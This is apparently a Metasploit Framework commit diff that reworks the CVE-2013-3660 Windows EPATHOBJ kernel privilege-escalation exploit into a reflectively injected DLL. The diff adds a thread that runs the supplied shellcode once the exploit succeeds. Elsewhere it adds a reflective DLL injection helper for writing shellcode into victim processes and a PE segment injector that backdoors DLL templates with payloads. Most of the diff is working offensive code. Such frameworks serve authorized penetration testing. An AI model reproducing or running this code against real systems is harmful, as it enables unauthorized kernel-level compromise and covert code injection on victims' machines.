{942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Debug|Win32.Build.0 = Debug|Win32
{942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Release|Win32.ActiveCfg = Release|Win32
{942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

31
external/source/exploits/cve-2013-3660/dll/src/ComplexPath.h → external/source/exploits/cve-2013-3660/ppr_flatten_rec/ComplexPath.h vendored
View File

@ -418,19 +418,10 @@
# define WIN32_NO_STATUS
#endif
#include <stdio.h>
#include <stdarg.h>
#include <stddef.h>
#include <windows.h>
#include <assert.h>
#ifdef WIN32_NO_STATUS
# undef WIN32_NO_STATUS
#endif
#include <ntstatus.h>
#pragma comment(lib, "gdi32")
#pragma comment(lib, "kernel32")
#pragma comment(lib, "user32")
#pragma comment(lib, "shell32")
#pragma comment(linker, "/SECTION:.text,ERW")
#ifndef PAGE_SIZE
@ -448,11 +439,6 @@ static ULONG ComplexPathNumRegion = 0;
static HANDLE Mutex;
static DWORD ComplexPathFinished = 0;
// Log levels.
typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;
BOOL LogMessage(LEVEL Level, PCHAR Format, ...);
// Copied from winddi.h from the DDK
#define PD_BEGINSUBPATH 0x00000001
#define PD_ENDSUBPATH 0x00000002
@ -509,16 +495,15 @@ ULONG HalQuerySystemInformation;
PULONG TargetPid;
PVOID *PsInitialSystemProcess;
VOID elevator_complex_path();
//#define DEBUGTRACE 1
#ifdef DEBUGTRACE
#define dprintf(...) real_dprintf(__VA_ARGS__)
#else
#define dprintf(...) do{}while(0);
#endif
// Log levels.
typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;
#ifdef DEBUGTRACE
VOID LogMessage(LEVEL Level, PCHAR Format, ...);
#define dprintf(...) real_dprintf(__VA_ARGS__)
static void real_dprintf(char *format, ...) {
va_list args;
char buffer[1024];
@ -527,3 +512,7 @@ static void real_dprintf(char *format, ...) {
strcat_s(buffer, sizeof(buffer), "\r\n");
OutputDebugStringA(buffer);
}
#else
#define dprintf(...)
#define LogMessage(...)
#endif

72
external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c → external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.c vendored
View File

@ -1,15 +1,15 @@
//===============================================================================================//
// This is a stub for the actuall functionality of the DLL.
// This is a stub for the actual functionality of the DLL.
//===============================================================================================//
// Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are
// defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own
// DllMain and use the LoadRemoteLibraryR() API to inject this DLL.
//===============================================================================================//
#include "ReflectiveLoader.h"
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
#include "ComplexPath.h"
// Purloined from ntstatus.h
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth
//
// --------------------------------------------------
// Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit
@ -550,7 +550,20 @@ VOID __declspec(naked) HalDispatchRedirect(VOID)
}
}
VOID elevator_complex_path()
/*!
* @brief Helper thread function which runs the given payload directly.
* @param lpPayload The payload shellcode to execute.
* @returns \c ERROR_SUCCESS
*/
DWORD WINAPI execute_payload(LPVOID lpPayload)
{
LogMessage(L_INFO, "[PPRFLATTENREC] Payload thread started.");
VOID(*lpCode)() = (VOID(*)())lpPayload;
lpCode();
return ERROR_SUCCESS;
}
VOID elevator_complex_path(LPVOID lpPayload)
{
HANDLE Thread;
HDC Device;
@ -566,6 +579,12 @@ VOID elevator_complex_path()
"\rWindows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit\n"
"\r------------------- taviso@cmpxchg8b.com, programmeboy@gmail.com ---\n"
"\n");
if (lpPayload == NULL) {
LogMessage(L_ERROR, "[PRFLATTENREC] payload argument not specified");
return;
}
NtQueryIntervalProfile = GetProcAddress(GetModuleHandle("ntdll"), "NtQueryIntervalProfile");
NtQuerySystemInformation = GetProcAddress(GetModuleHandle("ntdll"), "NtQuerySystemInformation");
Mutex = CreateMutex(NULL, FALSE, NULL);
@ -590,10 +609,10 @@ VOID elevator_complex_path()
// Lookup some system routines we require.
KernelHandle = LoadLibrary(ModuleInfo.Modules[0].FullPathName + ModuleInfo.Modules[0].OffsetToFileName);
HalDispatchTable = (ULONG) GetProcAddress(KernelHandle, "HalDispatchTable") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
PsInitialSystemProcess = (ULONG) GetProcAddress(KernelHandle, "PsInitialSystemProcess") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
PsReferencePrimaryToken = (ULONG) GetProcAddress(KernelHandle, "PsReferencePrimaryToken") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
PsLookupProcessByProcessId = (ULONG) GetProcAddress(KernelHandle, "PsLookupProcessByProcessId") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
HalDispatchTable = (PULONG)((ULONG) GetProcAddress(KernelHandle, "HalDispatchTable") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
PsInitialSystemProcess = (PVOID*)((ULONG) GetProcAddress(KernelHandle, "PsInitialSystemProcess") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
PsReferencePrimaryToken = (FARPROC)((ULONG) GetProcAddress(KernelHandle, "PsReferencePrimaryToken") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
PsLookupProcessByProcessId = (FARPROC)((ULONG) GetProcAddress(KernelHandle, "PsLookupProcessByProcessId") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
// Search for a ret instruction to install in the damaged HalDispatchTable.
HalQuerySystemInformation = (ULONG) memchr(KernelHandle, 0xC3, ModuleInfo.Modules[0].ImageSize)
@ -629,7 +648,7 @@ VOID elevator_complex_path()
// I need to map at least two pages to guarantee the whole structure is
// available.
while (!VirtualAlloc(*DispatchRedirect & ~(PAGE_SIZE - 1),
while (!VirtualAlloc((LPVOID)(*DispatchRedirect & ~(PAGE_SIZE - 1)),
PAGE_SIZE * 2,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE)) {
@ -740,7 +759,7 @@ VOID elevator_complex_path()
if (ComplexPathFinished) {
LogMessage(L_INFO, "Success...", ComplexPathFinished);
//ExitProcess(0);
CreateThread(0, 0, execute_payload, lpPayload, 0, NULL);
return;
}
@ -756,7 +775,8 @@ VOID elevator_complex_path()
}
// A quick logging routine for debug messages.
BOOL LogMessage(LEVEL Level, PCHAR Format, ...)
#ifdef DEBUGTRACE
VOID LogMessage(LEVEL Level, PCHAR Format, ...)
{
CHAR Buffer[1024] = {0};
va_list Args;
@ -774,23 +794,29 @@ BOOL LogMessage(LEVEL Level, PCHAR Format, ...)
//fflush(stdout);
//flush(stderr);
return TRUE;
}
extern HINSTANCE hAppInstance;
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
#else
#define LogMessage(...)
#endif
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
BOOL bReturnValue = TRUE;
switch( dwReason )
dprintf("[PPRFLATTENREC] DllMain invoked, reason: %u", dwReason);
switch (dwReason)
{
case DLL_QUERY_HMODULE:
if( lpReserved != NULL )
*(HMODULE *)lpReserved = hAppInstance;
hAppInstance = hinstDLL;
elevator_complex_path();
dprintf("[PPRFLATTENREC] Module queried %x", hinstDLL);
if (lpReserved != NULL)
{
*(HMODULE *)lpReserved = hAppInstance;
}
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
dprintf("[PPRFLATTENREC] Launching exploit with %p", lpReserved);
elevator_complex_path(lpReserved);
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:

141
external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.vcxproj vendored Executable file
View File

@ -0,0 +1,141 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{942BF20A-E438-48B0-A614-A6E0CC2E94BD}</ProjectGuid>
<RootNamespace>ppr_flatten_rec</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules />
<CodeAnalysisRuleAssemblies />
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;PPR_FLATTEN_REC_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX86</TargetMachine>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
</PostBuildEvent>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;PPR_FLATTEN_REC_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>false</GenerateDebugInformation>
<GenerateMapFile>true</GenerateMapFile>
<MapFileName>$(OutDir)\ppr_flatten_rec.map</MapFileName>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>
</OptimizeReferences>
<EnableCOMDATFolding>
</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>
</DataExecutionPrevention>
<ImportLibrary>$(OutDir)\ppr_flatten_rec.lib</ImportLibrary>
<TargetMachine>MachineX86</TargetMachine>
<Profile>false</Profile>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "..\..\..\..\..\data\exploits\CVE-2013-3660\" GOTO COPY
mkdir "..\..\..\..\..\data\exploits\CVE-2013-3660\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2013-3660\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="ppr_flatten_rec.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="ComplexPath.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>

9
external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.vcxproj.filters vendored Executable file
View File

@ -0,0 +1,9 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<ClCompile Include="ppr_flatten_rec.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="ComplexPath.h" />
</ItemGroup>
</Project>

20
external/source/exploits/cve-2013-3660/rdi.sln vendored
View File

@ -1,20 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual C++ Express 2010
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "dll\reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

7
external/source/exploits/make.bat vendored
View File

@ -26,6 +26,13 @@ PUSHD CVE-2010-0232
msbuild.exe make.msbuild /target:%PLAT%
POPD
IF "%ERRORLEVEL%"=="0" (
ECHO "Building CVE-2013-3660 (ppr_flatten_rec)"
PUSHD CVE-2013-3660
msbuild.exe make.msbuild /target:%PLAT%
POPD
)
FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j
SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6%
echo Finished %ldt%

37
lib/msf/base/simple/buffer.rb
View File

@ -16,11 +16,15 @@ module Buffer
#
# Serializes a buffer to a provided format. The formats supported are raw,
# ruby, perl, bash, c, js_be, js_le, java and psh
# num, dword, ruby, python, perl, bash, c, js_be, js_le, java and psh
#
def self.transform(buf, fmt = "ruby")
case fmt
when 'raw'
when 'num'
buf = Rex::Text.to_num(buf)
when 'dword', 'dw'
buf = Rex::Text.to_dword(buf)
when 'python', 'py'
buf = Rex::Text.to_python(buf)
when 'ruby', 'rb'
@ -54,11 +58,13 @@ module Buffer
#
# Creates a comment using the supplied format. The formats supported are
# raw, ruby, perl, bash, js_be, js_le, c, and java.
# raw, ruby, python, perl, bash, js_be, js_le, c, and java.
#
def self.comment(buf, fmt = "ruby")
case fmt
when 'raw'
when 'num', 'dword', 'dw'
buf = Rex::Text.to_js_comment(buf)
when 'ruby', 'rb', 'python', 'py'
buf = Rex::Text.to_ruby_comment(buf)
when 'perl', 'pl'
@ -84,19 +90,28 @@ module Buffer
# Returns the list of supported formats
#
def self.transform_formats
['raw',
'ruby','rb',
'perl','pl',
'bash','sh',
[
'bash',
'c',
'csharp',
'dw',
'dword',
'java',
'js_be',
'js_le',
'java',
'python','py',
'powershell','ps1',
'vbscript',
'vbapplication'
'num',
'perl',
'pl',
'powershell',
'ps1',
'py',
'python',
'raw',
'rb',
'ruby',
'sh',
'vbapplication',
'vbscript'
]
end

32
lib/msf/core/exe/segment_injector.rb
View File

@ -31,14 +31,12 @@ module Exe
def create_thread_stub
<<-EOS
hook_entrypoint:
pushad
push hook_libname
call [iat_LoadLibraryA]
push hook_funcname
push eax
call [iat_GetProcAddress]
mov eax, [iat_CreateThread]
lea edx, [thread_hook]
push 0
push 0
@ -68,8 +66,9 @@ module Exe
return asm
end
def payload_stub
asm = create_thread_stub
def payload_stub(prefix)
asm = "hook_entrypoint:\n#{prefix}\n"
asm << create_thread_stub
asm << payload_as_asm
shellcode = Metasm::Shellcode.assemble(processor, asm)
shellcode.encoded
@ -85,14 +84,37 @@ module Exe
pe.mz.encoded.export = pe_orig.encoded[0, 512].export.dup
pe.header.time = pe_orig.header.time
# Don't rebase if we can help it since Metasm doesn't do relocations well
pe.optheader.dll_characts.delete("DYNAMIC_BASE")
prefix = ''
if pe.header.characteristics.include? "DLL"
# if there is no entry point, just return after we bail or spawn shellcode
if pe.optheader.entrypoint == 0
prefix = "cmp [esp + 8], 1
jz spawncode
entrypoint:
xor eax, eax
inc eax
ret 0x0c
spawncode:"
else
# there is an entry point, we'll need to go to it after we bail or spawn shellcode
# if fdwReason != DLL_PROCESS_ATTACH, skip the shellcode, jump back to original DllMain
prefix = "cmp [esp + 8], 1
jnz entrypoint"
end
end
# Generate a new code section set to RWX with our payload in it
s = Metasm::PE::Section.new
s.name = '.text'
s.encoded = payload_stub
s.encoded = payload_stub prefix
s.characteristics = %w[MEM_READ MEM_WRITE MEM_EXECUTE]
# Tell our section where the original entrypoint was
if pe.optheader.entrypoint != 0
s.encoded.fixup!('entrypoint' => pe.optheader.image_base + pe.optheader.entrypoint)
end
pe.sections << s
pe.invalidate_header

3
lib/msf/core/module/author.rb
View File

@ -45,7 +45,8 @@ class Msf::Module::Author
'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com',
'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com',
'todb' => 'todb' + 0x40.chr + 'metasploit.com',
'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com'
'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com',
'wvu' => 'wvu' + 0x40.chr + 'metasploit.com'
}
#

2
lib/msf/core/module/reference.rb
View File

@ -102,8 +102,6 @@ class Msf::Module::SiteReference < Msf::Module::Reference
self.site = 'http://www.securityfocus.com/bid/' + in_ctx_val.to_s
elsif (in_ctx_id == 'MSB')
self.site = 'http://www.microsoft.com/technet/security/bulletin/' + in_ctx_val.to_s + '.mspx'
elsif (in_ctx_id == 'MIL')
self.site = 'http://milw0rm.com/metasploit/' + in_ctx_val.to_s
elsif (in_ctx_id == 'EDB')
self.site = 'http://www.exploit-db.com/exploits/' + in_ctx_val.to_s
elsif (in_ctx_id == 'WVE')

30
lib/msf/core/payload/windows/reflectivedllinject.rb
View File

@ -1,7 +1,7 @@
# -*- coding: binary -*-
require 'msf/core'
require 'rex/peparsey'
require 'msf/core/reflective_dll_loader'
module Msf
@ -15,6 +15,7 @@ module Msf
module Payload::Windows::ReflectiveDllInject
include Msf::ReflectiveDLLLoader
include Msf::Payload::Windows
def initialize(info = {})
@ -22,7 +23,10 @@ module Payload::Windows::ReflectiveDllInject
'Name' => 'Reflective DLL Injection',
'Description' => 'Inject a DLL via a reflective loader',
'Author' => [ 'sf' ],
'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ],
'References' => [
[ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original
[ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ] # customisations
],
'Platform' => 'win',
'Arch' => ARCH_X86,
'PayloadCompat' =>
@ -47,26 +51,8 @@ module Payload::Windows::ReflectiveDllInject
end
def stage_payload(target_id=nil)
dll = ""
offset = 0
begin
File.open( library_path, "rb" ) { |f| dll += f.read(f.stat.size) }
pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
pe.exports.entries.each do |entry|
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
offset = pe.rva_to_file_offset( entry.rva )
break
end
end
raise "Can't find an exported ReflectiveLoader function!" if offset == 0
rescue
print_error( "Failed to read and parse Dll file: #{$!}" )
return
end
# Exceptions will be thrown by the mixin if there are issues.
dll, offset = load_rdi_dll(library_path)
exit_funk = [ @@exit_types['thread'] ].pack( "V" ) # Default to ExitThread for migration

30
lib/msf/core/payload/windows/x64/reflectivedllinject.rb
View File

@ -1,7 +1,7 @@
# -*- coding: binary -*-
require 'msf/core'
require 'rex/peparsey'
require 'msf/core/reflective_dll_loader'
module Msf
@ -15,6 +15,7 @@ module Msf
module Payload::Windows::ReflectiveDllInject_x64
include Msf::ReflectiveDLLLoader
include Msf::Payload::Windows
def initialize(info = {})
@ -22,7 +23,10 @@ module Payload::Windows::ReflectiveDllInject_x64
'Name' => 'Reflective DLL Injection',
'Description' => 'Inject a DLL via a reflective loader',
'Author' => [ 'sf' ],
'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ],
'References' => [
[ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original
[ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ] # customisations
],
'Platform' => 'win',
'Arch' => ARCH_X86_64,
'PayloadCompat' =>
@ -47,26 +51,8 @@ module Payload::Windows::ReflectiveDllInject_x64
end
def stage_payload
dll = ""
offset = 0
begin
::File.open( library_path, "rb" ) { |f| dll += f.read(f.stat.size) }
pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
pe.exports.entries.each do |entry|
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
offset = pe.rva_to_file_offset( entry.rva )
break
end
end
raise "Can't find an exported ReflectiveLoader function!" if offset == 0
rescue
print_error( "Failed to read and parse Dll file: #{$!}" )
return
end
# Exceptions will be thrown by the mixin if there are issues.
dll, offset = load_rdi_dll(library_path)
exit_funk = [ @@exit_types['thread'] ].pack( "V" ) # Default to ExitThread for migration

60
lib/msf/core/post/windows/reflective_dll_injection.rb Normal file
View File

@ -0,0 +1,60 @@
# -*- coding: binary -*-
require 'msf/core/reflective_dll_loader'
###
#
# This module exposes functionality which makes it easier to do
# Reflective DLL Injection into processes on a victim's machine.
#
###
module Msf::Post::Windows::ReflectiveDLLInjection
include Msf::ReflectiveDLLLoader
PAGE_ALIGN = 1024
#
# Inject the given shellcode into a target process.
#
# @param process [Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Process]
# The process to inject the shellcode into.
# @param shellcode [String] The shellcode to inject.
#
# @return [Fixnum] Address of the shellcode in the target process's
# memory.
#
def inject_into_process(process, shellcode)
shellcode_size = shellcode.length
unless shellcode.length % PAGE_ALIGN == 0
shellcode_size += PAGE_ALIGN - (shellcode.length % PAGE_ALIGN)
end
shellcode_mem = process.memory.allocate(shellcode_size)
process.memory.protect(shellcode_mem)
process.memory.write(shellcode_mem, shellcode)
return shellcode_mem
end
#
# Inject a reflectively-injectable DLL into the given process
# using reflective injection.
#
# @param process [Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Process]
# The process to inject the shellcode into.
# @param dll_path [String] Path to the DLL that is to be loaded and injected.
#
# @return [Array] Tuple of allocated memory address and offset to the
# +ReflectiveLoader+ function.
#
def inject_dll_into_process(process, dll_path)
dll, offset = load_rdi_dll(dll_path)
dll_mem = inject_into_process(process, dll)
return dll_mem, offset
end
end

43
lib/msf/core/reflective_dll_loader.rb Normal file
View File

@ -0,0 +1,43 @@
# -*- coding: binary -*-
###
#
# This mixin contains functionality which loads a Reflective
# DLL from disk into memory and finds the offset of the
# reflective loader's entry point.
#
###
module Msf::ReflectiveDLLLoader
#
# Load a reflectively-injectable DLL from disk and find the offset
# to the ReflectiveLoader function inside the DLL.
#
# @param dll_path Path to the DLL to load.
#
# @return [Array] Tuple of DLL contents and offset to the
# +ReflectiveLoader+ function within the DLL.
#
def load_rdi_dll(dll_path)
dll = ''
offset = nil
::File.open(dll_path, 'rb') { |f| dll = f.read }
pe = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(dll))
pe.exports.entries.each do |e|
if e.name =~ /^\S*ReflectiveLoader\S*/
offset = pe.rva_to_file_offset(e.rva)
break
end
end
unless offset
raise "Cannot find the ReflectiveLoader entry point in #{dll_path}"
end
return dll, offset
end
end

32
lib/msf/util/exe.rb
View File

@ -169,21 +169,11 @@ require 'msf/core/exe/segment_injector'
payload = win32_rwx_exec(code)
# Create a new PE object and run through sanity checks
endjunk = true
fsize = File.size(opts[:template])
pe = Rex::PeParsey::Pe.new_from_file(opts[:template], true)
text = nil
sections_end = 0
pe.sections.each do |sec|
text = sec if sec.name == ".text"
sections_end = sec.size + sec.file_offset if sec.file_offset >= sections_end
endjunk = false if sec.contains_file_offset?(fsize-1)
end
#also check to see if there is a certificate
cert_entry = pe.hdr.opt['DataDirectory'][4]
#if the cert is the only thing past the sections, we can handle.
if cert_entry.v['VirtualAddress'] + cert_entry.v['Size'] >= fsize and sections_end >= cert_entry.v['VirtualAddress']
endjunk = false
end
#try to inject code into executable by adding a section without affecting executable behavior
@ -1729,8 +1719,25 @@ def self.to_vba(framework,code,opts={})
def self.to_executable_fmt_formats
[
'dll','exe','exe-service','exe-small','exe-only','elf','macho','vba','vba-exe',
'vbs','loop-vbs','asp','aspx', 'aspx-exe','war','psh','psh-net', 'msi', 'msi-nouac'
"asp",
"aspx",
"aspx-exe",
"dll",
"elf",
"exe",
"exe-only",
"exe-service",
"exe-small",
"loop-vbs",
"macho",
"msi",
"msi-nouac",
"psh",
"psh-net",
"vba",
"vba-exe",
"vbs",
"war"
]
end
@ -1757,4 +1764,3 @@ def self.to_vba(framework,code,opts={})
end
end
end

12
lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
View File

@ -329,14 +329,21 @@ class Console::CommandDispatcher::Stdapi::Sys
return true
end
# validate all the proposed pids first so we can bail if one is bogus
self_destruct = args.include?("-s")
if self_destruct
valid_pids = [client.sys.process.getpid.to_i]
else
valid_pids = validate_pids(args)
# validate all the proposed pids first so we can bail if one is bogus
args.uniq!
diff = args - valid_pids.map {|e| e.to_s}
if not diff.empty? # then we had an invalid pid
print_error("The following pids are not valid: #{diff.join(", ").to_s}. Quitting")
return false
end
end
# kill kill kill
print_line("Killing: #{valid_pids.join(", ").to_s}")
@ -348,8 +355,9 @@ class Console::CommandDispatcher::Stdapi::Sys
# help for the kill command
#
def cmd_kill_help
